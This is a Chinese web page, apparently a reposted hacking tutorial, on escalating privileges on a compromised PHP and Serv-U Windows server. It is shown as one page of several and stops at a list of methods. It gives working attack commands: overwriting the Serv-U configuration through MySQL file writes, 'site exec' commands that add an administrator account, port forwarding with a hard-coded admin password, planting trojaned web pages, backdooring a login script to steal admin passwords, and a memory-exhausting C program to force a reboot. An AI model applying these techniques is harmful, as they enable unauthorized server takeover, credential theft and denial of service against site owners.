首页/杀毒教程/内容

很强的php注入后的提权

杀毒教程2024-01-03 阅读()
[摘要]RWAMELCDP这一串是关键, 我们比以前多加了一个"E"代表我们有"执行"权限, Maintenance=System表示我们的身份是管理员。 在本地设...
RWAMELCDP这一串是关键, 我们比以前多加了一个"E"代表我们有"执行"权限, Maintenance=System表示我们的身份是管理员。

在本地设置好后, 就开始想办法, 替换掉它的文件?首先, 利用我的哪个cmd.。 php SHELL的上传文件功能, 先把它上传到d:\s***n\a***lover\photo\gallery目录(上传成功后文件与SHELL在同一目 录)下, 同样再打开牛族MYSQL连接器:

user download;

create table servu (cmd TEXT);

load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;

select * from servu into outfile "C:\Program Files\Serv-U\ServUDaemon.ini";

条件是SERV-U重启后, 我们的哪个用户就是管理员了, 而且在C盘根目录下具有可执行权限。 登上SERV-U服务器上执行如下命令:

quote site exec net.exe user hello hello /add

quote site exec net.exe localgroup administrators hello /add

这样我们就得到了一个管理员级的用户hello。 如果没有开3389我们可以利用PUT上传给它上传个3389.EXE,然后用quote执行后, 就可以用 3389登录器连接了!同样我们也可以利用另外一个小工具xyzcmd.exe在dos下登录, 会得到一个CMDSHELL.

方法三:由于管理员在PHP.INI中做了一些限制, 上传的PHPSHELL没法执行外部命令

利用CMD.PHP的浏览命令, 你可以在它的上面找到它的PHP和SERV- U的安装程序, DOWN下来, 在本机上模拟它的环境, 配置自己的PHP.INI文件, 使它能够执行外部命令, 解释ASP和CGI, 然后利用方法二替换掉它 的PHP.INI文件。 也有个条件就是WEB重启后才能生效。 我们需要一个小东西-FPIPE.EXE端口重定向工具!fpipe -v -l 5210 -s 5209 -r 43958 127.0.0.1(把本机的43958端口, 通过5209端口, 转发到5210端口)打开你本地SERV-U添加一台服务器, 来连接5210,填上服务 器IP, 监听端口号5210, 填上帐户和密码!  user:LocalAdministratorpass:#l@$ak#.lk;0@P全部搞定后, 来连接SERV-U, 连接成功后, 我们就对此服务器SERV-U有了完全控制权限!然后登录上 SERV-U加管理员用户就OK了!

方法四:社会工程学加网页木马!

在04年黑防第6期我的朋友血汉的《网页木马让你肉鸡成群》一文中, 讲了许多 做木马的方法, 在这里就不啰嗦了, 省的老独说转稿费, 哈哈!把"马"传上去后, 可以在论坛里发个贴子, 如"管理员我发现了此网站一个漏洞!"或"管理员我 对网站有几点建议"估计不久真的会成为"养鸡专业户了"。 建议不要改人家的主页, 一来不好, 二来如果挂在主页上, 管理员看到后不一定会点开!还有更隐蔽的 一招, 就是修改源程序(估计一般管理员不会没事读源程序吧^_^), 找到网站登录的程序, 加一段程序, 可以根据ID来判断是管理员, 如果是把他的密码(在 如MD5加密前)插入到你的信箱或qq等字段中, 这样你可以打开你的用户资料来看了!!

接下来谈谈如何叫服务器重起:

方法一、我非常建议用的方法哪就是dos攻击!

方法二、如果你上传的SHELL能执行命令!可以传一个很简单的C程序, 让它不断地MALLOC分配内存, 而且不FREE。

#i nclude

#i nclude

main()

{for(; ;) malloc(0xffffff);}

方法三、如果一些网站是PHP的不能执行外部命令(我们上传上去的可执行文件不能运行)!





第1页  第2页  第3页  第4页 

……

相关阅读